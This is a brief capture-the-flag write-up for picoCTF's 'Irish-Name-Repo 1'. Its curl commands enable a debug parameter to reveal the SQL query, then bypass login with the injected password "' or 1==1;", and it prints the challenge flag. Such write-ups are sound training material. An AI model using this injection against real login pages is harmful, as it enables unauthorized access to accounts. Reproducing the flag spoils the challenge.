# Irish-Name-Repo 1

## Objetivo
There is a website running at. Do you think you can log us in? Try to see if you can login!
## Solucion
```bash
┌──(kali㉿kali)-[~]
└─$ curl https://jupiter.challenges.picoctf.org/problem/50009/login.php -d "username=admin&password=pass&dbug=True" 
<h1>Login failed.</h1>                                                                             
┌──(kali㉿kali)-[~]
└─$ curl https://jupiter.challenges.picoctf.org/problem/50009/login.php -d "username=admin&password=pass&debug=1"  
<pre>username: admin
password: pass
SQL query: SELECT * FROM users WHERE name='admin' AND password='pass'
</pre><h1>Login failed.</h1>                                                                             
┌──(kali㉿kali)-[~]
└─$ curl https://jupiter.challenges.picoctf.org/problem/50009/login.php -d "username=admin&password=' or 1==1;&debug=1"
<pre>username: admin
password: ' or 1==1;
SQL query: SELECT * FROM users WHERE name='admin' AND password='' or 1==1;'
</pre><h1>Logged in!</h1><p>Your flag is: picoCTF{s0m3_SQL_fb3fe2ad}</p>                                                                             
┌──(kali㉿kali)-[~]
└─$ 

```
## Notas

## Referencias
https://www.w3schools.com/sql/sql_injection.asp
